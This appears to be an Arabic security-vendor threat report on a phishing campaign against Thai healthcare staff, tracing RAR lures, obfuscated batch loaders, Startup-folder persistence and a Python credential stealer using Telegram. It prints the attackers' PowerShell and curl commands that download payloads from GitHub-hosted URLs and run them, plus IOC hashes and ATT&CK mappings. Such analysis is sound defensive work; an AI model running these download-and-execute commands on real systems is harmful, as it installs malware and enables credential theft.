المؤلفون: فايبهاف كروشنا بيلاد، ديكسيت بانشال ورومانا صديقي.
جدول المحتويات
- المقدمة
- الأهداف الرئيسية
- سلسلة العدوى
- النتائج الأولية للحملة
- التحليل الفنى
- المرحلة 1: التسليم الأولي (أرشيف RAR)
- المرحلة الثانية: مُحمِّل الدفعات المُبهم بواسطة روكي
- المرحلة 3: نص برمجي لاستمرار بدء التشغيل
- المرحلة الرابعة: تنفيذ الحمولة الثانوية
- المرحلة 5: نشر برنامج سرقة المعلومات (sim.py)
- خاتمة
- Seqrite تغطية
- مؤشرات الاختراق (IOCs)
- رسم خرائط MITRE ATT&CK
المقدمة
Seqrite يتتبع المختبر ويحلل بنشاط الجهات الفاعلة في التهديدات وحملاتها، مع التركيز على تحديد مصدر الهجمات، وتحليل البنية التحتية، وأساليب الخصوم. وقد نسبنا، من خلال أبحاثنا، العديد من العمليات إلى مجموعات تهديد موالية للصين وغيرها، تستهدف كيانات إقليمية ودولية على حد سواء.
خلال تحقيق أجريناه مؤخرًا، رصدنا حملة برمجيات خبيثة نشطة تستهدف قطاع الرعاية الصحية في تايلاند، بما في ذلك العاملين في وزارة الصحة والمنظمات الصحية التابعة لها. تعتمد الحملة على أساليب تصيد احتيالي موجهة ذات طابع صحي، تُوزع عبر ملفات RAR خبيثة تحتوي على نصوص برمجية مشفرة وحمولات تنفيذية. تستخدم سلسلة العدوى مراحل متعددة من التمويه، وتسليم الحمولة عبر منصة GitHub، وآليات استمرارية، وبرمجيات خبيثة لسرقة المعلومات، مصممة للتغلغل في البيئات المستهدفة مع تجنب الكشف عنها.

الأهداف الرئيسية
تستهدف الحملة في المقام الأول الأفراد والإدارات في جميع أنحاء النظام البيئي للرعاية الصحية في تايلاند، بما في ذلك:
- موظفو وزارة الصحة وفرق المشتريات الصحية الحكومية من خلال طُعم انتحال صفة وثائق الموافقة الرسمية على المعدات الطبية.
- قام موظفو إدارة المستشفى بتزوير مستندات طلبات قبول المرضى.
- موظفو قسم الأشعة وعيادة الأسنان من خلال سجلات طبية مزيفة وملفات استفسارات الأشعة السينية.
- الأقسام السريرية والشعاعية من خلال وثائق نتائج فحص الأشعة المقطعية المزيفة للمرضى.
- فرق سلسلة التوريد في مجال الرعاية الصحية وفرق شراء المعدات الطبية من خلال وثائق الموافقة التي تحمل علامة وزارة الصحة.
تشير سمات الإغراء إلى استهداف متعمد للوظائف المتعلقة بالرعاية الصحية، وتدل على فهم قوي لسير العمليات التشغيلية داخل هذا القطاع.
سلسلة العدوى
ملف RAR مضغوط → برنامج تحميل ملفات BAT مُشفر → برنامج تحميل حمولة مُشفر باستخدام Rouki → برنامج نصي للتشغيل المستمر (WindowSecuryt.bat) → حمولة دفعية ثانوية (u-t2.bat) → برنامج سرقة معلومات قائم على لغة بايثون (sim.py) → محاولات تسريب بيانات من تيليجرام

النتائج الأولية للحملة
تم تحميل أول عينة تم تحديدها والمرتبطة بالحملة في 7 أبريل 2026، بينما تم تحميل أحدث عينة تم رصدها في 3 يونيو 2026، مما يشير إلى نافذة تشغيل نشطة لمدة عشرة أسابيع تقريبًا في وقت التحليل.
الملاحظات الرئيسية
- تم تحميل جميع العينات المحددة من تايلاند، مما يشير إلى استخدام بنية تحتية محلية للتوزيع أو أنظمة محلية مخترقة.
- يقوم المهاجم بتوزيع البرامج الضارة من خلال أرشيفات RAR التي تحتوي على نصوص برمجية خبيثة وملفات تنفيذية متنكرة في هيئة وثائق متعلقة بالرعاية الصحية والحكومة.
- يتم تصميم أسماء ملفات الإغراء لتناسب وظائف محددة، بما في ذلك الموظفين الإداريين والسريريين وموظفي الأشعة وموظفي المشتريات، مما يشير إما إلى استطلاع مسبق لمنظمات الرعاية الصحية أو إلى استراتيجية استهداف واسعة النطاق تستند إلى معرفة خاصة بالقطاع.
- تستخدم جميع العينات التي تمت ملاحظتها سلسلة تنفيذ متسقة RAR → BAT → Payload، مما يشير إلى مجموعة أدوات موحدة ومنهجية تسليم قابلة للتكرار.
التحليل الفنى
المرحلة 1: التسليم الأولي (أرشيف RAR)
تتكون آلية العدوى الأولية من ملف RAR خبيث يحتوي على ملف دفعي مُشفر يعمل كبرنامج تحميل أولي. ويُستخدم التشفير على نطاق واسع لإخفاء الوظائف وإعاقة التحليل الثابت.

تقوم إحدى العينات المرصودة، Health_Ministry_Approved_Equipment_2026.bat، بإنشاء ملف مؤقت يحتوي على بيانات حمولة مشفرة، وتستخدم PowerShell لفك تشفير المحتوى المضمن. ثم يُكتب المحتوى الذي تم فك تشفيره إلى ملف دفعي ثانوي، والذي يتم تنفيذه لاحقًا.

بعد التنفيذ، تتم إزالة القطع الأثرية المؤقتة لتقليل الأدلة الجنائية وتعقيد التحقيقات اللاحقة للاختراق.
يشير استخدام بيانات الحمولة المضمنة، وروتينات فك التشفير المستندة إلى PowerShell، وعمليات التنظيف إلى جهد متعمد لإخفاء الوظائف الضارة والتهرب من ضوابط الأمان.
المرحلة الثانية: مُحمِّل الدفعات المُبهم بواسطة روكي
تم إخفاء ملف payload.bat الذي تم فك تشفيره والذي تم تنفيذه خلال المرحلة 1 بشكل كبير باستخدام إطار عمل تم تحديده باسم Rouki.

كشف التحليل أن البرنامج النصي يُعيد بناء وتنفيذ أوامر PowerShell ديناميكيًا، والتي بدورها تُنزّل وتُثبّت وتُشغّل مكونات برمجية خبيثة إضافية. ويُتيح استخدام حمولات مُستضافة على GitHub، وامتدادات ملفات مُضلّلة، وتنفيذ متعدد المراحل، مرونة تشغيلية مع تقليل احتمالية اكتشافه.
أمر PowerShell رقم 1 - نشر البيانات الدائمة
powershell.exe -WindowStyle Hidden -Command “[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ud-7-te/ud-vtn/raw/main/up-t2.png', 'C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryt.bat');”
يقوم هذا الأمر بتنزيل ملف مستضاف عن بعد متنكراً في صورة PNG وتخزينه باسم WindowSecurity.bat داخل مجلد بدء تشغيل Windows.
يضمن وضع الملف داخل دليل بدء التشغيل التنفيذ التلقائي كلما قام المستخدم بتسجيل الدخول إلى النظام، مما يؤدي إلى استمراريته.
أمر PowerShell رقم 2 - نشر الحمولة
powershell.exe -Command “[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/d7-te/vtn/raw/main/T2.zip', 'C:\Users\Public\Desktops.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Public\Desktops.zip', 'C:\Users\Public\Desktops'); Start-Sleep -Seconds 1; C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py; del C:\Users\Public\Desktops.zip”
يقوم هذا الأمر بتنزيل أرشيف ZIP، واستخراج محتوياته إلى دليل يمكن الوصول إليه بشكل عام، وتنفيذ الحمولة المضمنة القائمة على لغة بايثون (sim.py) باستخدام مترجم بايثون المرفق.
بعد التنفيذ، يتم حذف ملف ZIP المضغوط لتقليل الآثار الجنائية وإعاقة جهود الاستجابة للحوادث.
المرحلة 3: برنامج نصي لاستمرارية بدء التشغيل (WindowSecurity.bat)
أظهر تحليل ملف WindowSecurity.bat الذي تم تنزيله أنه يحتوي على كمية كبيرة من البيانات غير الضرورية ومنطق التشفير المشابه لما لوحظ في برامج تحميل الدفعات في المراحل الأولى. ويهدف هذا المحتوى غير الوظيفي إلى عرقلة التحليل الثابت وإخفاء مسار التنفيذ الحقيقي للبرنامج النصي.
عند التنفيذ، يقوم البرنامج النصي بإجراء فحص للصلاحيات وإعداد البيئة قبل الوصول إلى مرحلته الوظيفية النهائية، حيث يقوم بإعادة بناء وتنفيذ الأمر التالي:
cmd /c “curl hxxps://raw.githubusercontent.com/ud-7-te/ud-vtn/main/ud-t2.txt -o C:\Users\admin\AppData\Local\Temp\u-t2.bat && call C:\Users\admin\AppData\Local\Temp\u-t2.bat”
يستخدم هذا الأمر أداة curl لتنزيل ملف دفعي إضافي (u-t2.bat) من مستودع مُستضاف على GitHub، ويخزنه في المجلد المؤقت للنظام (%TEMP%). يضمن استخدام المسار %TEMP% إمكانية الكتابة دون الحاجة إلى صلاحيات إدارية في معظم بيئات التشغيل.
بعد اكتمال التنزيل بنجاح، يقوم البرنامج النصي بتنفيذ الحمولة على الفور باستخدام أمر الاستدعاء، مما يتيح استمرار سلسلة العدوى متعددة المراحل.
إن الجمع بين استمرارية مجلد بدء التشغيل والحمولات القابلة للاسترداد عن بعد يمكّن الجهة الفاعلة في التهديد من تحديث الوظائف الضارة دون تعديل آلية الاستمرارية الأصلية.
بالإضافة إلى ذلك، يضمن وضع البرنامج النصي داخل مجلد بدء تشغيل ويندوز استمراريته، مما يضمن تنفيذه تلقائيًا عند تسجيل دخول المستخدم. وهذا يسمح للمهاجم باسترداد وتنفيذ حمولات محدثة بشكل متكرر من بنية GitHub البعيدة دون تعديل آلية الاستمرارية الأصلية، مما يتيح تحكمًا مرنًا وطويل الأمد في سلسلة العدوى.
المرحلة الرابعة: تنفيذ الحمولة الثانوية (u-t2.bat)

كشف تحليل ملف u-t2.bat الذي تم تنزيله عن احتوائه على تعليمات برمجية غير ضرورية وأجزاء مبهمة مشابهة لمكونات الدفعات السابقة في سلسلة العدوى. تظهر هذه العناصر غير الوظيفية في بداية الملف، وهي مصممة لعرقلة التحليل الثابت وإخفاء مسار التنفيذ الفعلي. أما المنطق الهادف فهو مُضمّن في أعماق هذه الأجزاء المبهمة، ولا يُكشف إلا أثناء تشغيل البرنامج.
يحاول البرنامج النصي إعادة تشغيل نفسه بصلاحيات موسعة للحصول على وصول أعلى مستوى إلى النظام.
بعد نجاح عملية رفع مستوى الصلاحيات، ينتقل البرنامج النصي إلى تنفيذ حمولة المرحلة التالية مع تقليل رؤية المستخدم إلى أدنى حد.
تؤدي المرحلة النهائية من التنفيذ إلى إطلاق الحمولة التالية:
powershell.exe -WindowStyle Hidden -Command “C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py”
يقوم هذا الأمر بتشغيل مترجم بايثون الذي تم نشره مسبقًا وتنفيذ sim.py مع إخفاء نوافذ التنفيذ المرئية.
يتيح استخدام بيئة تشغيل بايثون المجمعة التنفيذ بشكل مستقل عن أي تثبيت موجود لبايثون على نظام الضحية ويقلل من تبعيات النشر.
المرحلة 5: نشر برنامج سرقة المعلومات (sim.py)
الحمولة النهائية التي تم تحديدها أثناء التحليل هي sim.py، وهي أداة لسرقة المعلومات تعتمد على لغة بايثون ويتم تنفيذها من خلال بيئة بايثون المجمعة.

بعد التنفيذ، يقوم البرنامج الخبيث بإغلاق العديد من متصفحات الويب، بما في ذلك جوجل كروم، ومايكروسوفت إيدج، وبرايف، وغيرها من المتصفحات المبنية على كروميوم، باستخدام أوامر taskkill. يرتبط هذا السلوك عادةً بالبرامج الخبيثة التي تسعى لسرقة المعلومات، والتي تحاول الوصول إلى قواعد بيانات المتصفح، ومخازن بيانات الاعتماد، وملفات تعريف الارتباط، وبيانات الجلسات التي قد تكون محجوزة بواسطة العمليات النشطة.
القدرات الملحوظة
- يجمع البيانات المتعلقة بالمتصفح.
- يقوم بجمع بيانات الاعتماد المخزنة ومعلومات الجلسة.
- تقوم المراحل بجمع البيانات داخل الدلائل المؤقتة.
- يقوم بضغط البيانات التي تم جمعها في ملفات ZIP.
- محاولات لتسريب البيانات عبر بنية تحتية تعتمد على تطبيق تيليجرام.
كشفت سجلات التنفيذ عن محاولات متكررة لنقل البيانات المسروقة إلى قنوات Telegram التي يتحكم بها المهاجم باستخدام رموز البوت المضمنة ومعرفات الدردشة عبر واجهة برمجة تطبيقات Telegram Bot API.
تضمنت طلبات استخراج البيانات بيانات وصفية خاصة بالضحية مثل:
- معرّفات النظام
- معلومات اسم المستخدم
- عدادات البيانات المجمعة
- مراجع الأرشيف
على الرغم من فشل محاولات الاختراق الملحوظة بسبب انقطاع الاتصال عند التواصل مع api.telegram.org، إلا أن الجمع بين جمع بيانات المتصفح، والتجهيز المحلي، وإنشاء الأرشيف، ومحاولة الإرسال يؤكد قدرات الحمولة على سرقة المعلومات.
بشكل عام، تُظهر البرامج الضارة خصائص ترتبط عادةً ببرامج السرقة الحديثة القائمة على لغة بايثون، بما في ذلك سرقة بيانات الاعتماد، وجمع ملفات تعريف الارتباط الخاصة بالجلسة، وتخزين البيانات المحلية، وإنشاء الأرشيفات، وآليات تسريب البيانات القائمة على تطبيق تيليجرام.
يساهم استخدام تسليم الحمولة المستضافة على GitHub، وأدوات النظام المشروعة، والتشويش متعدد الطبقات، والتنفيذ متعدد المراحل في كل من المرونة التشغيلية والتهرب من الدفاع.
خاتمة
Seqrite يقيّم المختبر بثقة معتدلة أن هذه الحملة تمثل جهدًا مستهدفًا ضد قطاع الرعاية الصحية في تايلاند، مستفيدًا من طُعم الهندسة الاجتماعية ذات الطابع الصحي، ومحملات الدفعات متعددة المراحل، وبنية الحمولة المستضافة على GitHub، والبرامج الضارة لسرقة المعلومات القائمة على لغة بايثون.
تُظهر الحملة منهجية تسليم قابلة للتكرار تتكون من أرشيفات RAR، ونصوص دفعية مشوشة للغاية، واستمرارية من خلال إساءة استخدام مجلد بدء التشغيل، واسترجاع الحمولة المرحلية، ومحاولات الاستخراج القائمة على Telegram.
على الرغم من عدم إمكانية تحديد هوية الجهة الفاعلة بشكل قاطع بناءً على الأدلة المتاحة حاليًا، إلا أن التناسق العملياتي الملحوظ في جميع العينات يشير إلى أن النشاط يُنفذ من قبل جهة تهديد واحدة أو مجموعة مترابطة. وقد يوفر الرصد المستمر للبنية التحتية ذات الصلة، وتطور الحمولة، ودراسة الضحايا، رؤى إضافية حول تحديد هوية الجهة الفاعلة وأهداف الحملة.
ينبغي على المؤسسات العاملة في قطاع الرعاية الصحية أن تظل متيقظة ضد حملات التصيد الاحتيالي التي تستخدم المستندات، وأن تراقب التعديلات غير المصرح بها على مجلد بدء التشغيل، وأن تقيد تنفيذ البرامج النصية والثنائيات غير الموثوقة التي يتم الحصول عليها من مصادر خارجية.
Seqrite تغطية:
- Script.Trojan.Downloader.50836.GC
- cld.script.trojan.1759432951
مؤشرات الاختراق (IOCs):
| اسم الملف | SHA256 |
| Health_Ministry_Approved_Equipment_2026.rar | E5F6D9D405819E6B05B5D8268A2E973294859AD65237EDE36AB612B536D0AC2B |
| Health_Ministry_Approved_Equipment_2026.bat | 4EEBC38297A307D18784D6F9EBC8AA6E6F69860BE970CC70D9E544DEB1FF6CE0 |
| payload.bat | F4D4B8CAC004BB63834C6DF436721BABD9464C09787C80B268D839E0AADA9F87 |
| WindowSecurity.bat | 74BB6AD7E1310F30A3E24FD3CBBFFA2C0C41C64E89E5D0DD1D6900E96B914183 |
| u-t2.bat | 7709D8C34D490509F3624104611EB75A862944DD9D7A642F44514ADA16C85EE9 |
| Desktops.zip | 523388567630E4FBDC359F75232BF2AD82671A680D4BFDCE0237FC30DFEC4C80 |
| سارق (SIM.PY) | 442E0F4E822842922E7E4685840194E99FD68C7F0EC38C1925914B8F724D5865 |
رسم خرائط MITRE ATT&CK:
| تكتيك | اسم التقنية | معرف التقنية |
| الوصول الأولي | التصيد الاحتيالي: مرفق التصيد الاحتيالي الموجه | T1566.001 |
| التنفيذ | مترجم الأوامر والبرمجة: Windows Command Shell | T1059.003 |
| مترجم الأوامر والبرمجة: بوويرشيل | T1059.001 | |
| تنفيذ المستخدم: ملف ضار | T1204.002 | |
| التهرب الدفاعي | ملفات أو معلومات مبهمة | T1027 |
| التمويه (ملف BAT متنكر في شكل PNG/TXT) | T1036 | |
| إزالة المؤشر على المضيف: حذف الملف | T1070.004 | |
| إصرار | مفاتيح تشغيل التسجيل / مجلد بدء التشغيل | T1547.001 |
| التنفيذ المجدول عبر مجلد بدء التشغيل | T1547 | |
| التصعيد امتياز | آلية التحكم في ارتفاع الإساءة | T1548 |
| الاكتشاف | مالك النظام / اكتشاف المستخدم | T1033 |
| الوصول إلى بيانات الاعتماد | بيانات الاعتماد من مخازن كلمات المرور | T1555 |
| بيانات الاعتماد من متصفحات الويب | T1555.003 | |
| التشكيلات | أرشفة البيانات المجمعة | T1560 |
| البيانات من النظام المحلي | T1005 | |
| البيانات من مستودعات المعلومات | T1213 | |
| القيادة والتحكم | نقل أدوات الدخول (حمولات مستضافة على GitHub) | T1105 |
| بروتوكول طبقة التطبيق: بروتوكولات الويب (HTTPS) | T1071.001 | |
| بروكسي من خلال خدمات شرعية (GitHub) | T1102 | |
| exfiltration | التسلل عبر خدمة الويب (Telegram Bot API) | T1567 |
| نقل البيانات إلى التخزين السحابي/خدمة الويب | T1567.002 |




